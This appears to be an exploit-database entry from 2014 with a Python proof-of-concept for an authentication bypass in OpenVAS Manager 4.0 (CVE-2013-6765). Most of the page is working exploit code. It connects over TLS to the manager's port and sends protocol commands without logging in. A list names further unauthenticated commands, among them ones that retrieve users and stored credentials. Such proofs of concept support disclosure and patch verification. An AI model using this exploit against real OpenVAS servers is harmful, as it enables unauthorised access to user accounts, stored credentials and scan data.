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OpenVAS Manager 4.0 - Authentication Bypass Vulnerability PoC

🗓️ 21 Jul 2014 00:00:00Reported by EccEType 
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OpenVAS Manager 4.0 Authentication Bypass Vulnerability PoC. List of working commands and proof of concept

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#!/usr/bin/python
 
# Exploit Title: OpenVAS Manager 4.0 Authentication Bypass Vulnerability PoC
# Date: 09/07/2014
# Exploit Author: EccE
# Vendor Homepage: http://www.openvas.org/
# Software Link: http://wald.intevation.org/frs/?group_id=29
# Version: OpenVAS Manager 4.0
# Tested on: Debian GNU/Linux testing (jessie)
# CVE : CVE-2013-6765
 
"""
    Small list of working commands
 
get_agents
get_configs
get_alerts
get_filters
get_lsc_credentials
get_notes
get_nvts
get_targets
get_users
get_schedules
 
 
More commands (~70 commands) can be found directly in the omc.c file. Not all of them are working though.
As designed in OMP protocol, commands must be sent this way : <COMMAND/>
 
"""
 
import socket, ssl
 
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 
# Require a certificate from the server. We used a self-signed certificate
# so here cacerts.pem must be the server certificate itself.
ssl_sock = ssl.wrap_socket(s,
                           ca_certs="/var/lib/openvas/CA/cacert.pem",
                           cert_reqs=ssl.CERT_REQUIRED)
 
# OpenVAS Manager listen by default on localhost tcp/9390
ssl_sock.connect(('localhost', 9390))
 
 
print "#################################################################"
print "# Proof of Concept - OpenVAS Manager 4.0 Authentication Bypass  #"
print "#################################################################"
print "\n"
 
print "--> Retrieving version...(exploiting the bug !)\n"
ssl_sock.write("<get_version/>")
data = ssl_sock.read()
print data
print "\n"
 
 
print "--> Retrieving slaves...\n"
ssl_sock.write("<get_slaves/>")
tasks = ssl_sock.read()
print tasks
print "\n"
 
"""
print "--> Creating note...\n"
ssl_sock.write("<create_note/>")
note = ssl_sock.read()
print note
 
print "--> Retrieving users list...\n"
ssl_sock.write("<get_users/>")
users_list = ssl_sock.read()
print users_list
"""
ssl_sock.close()

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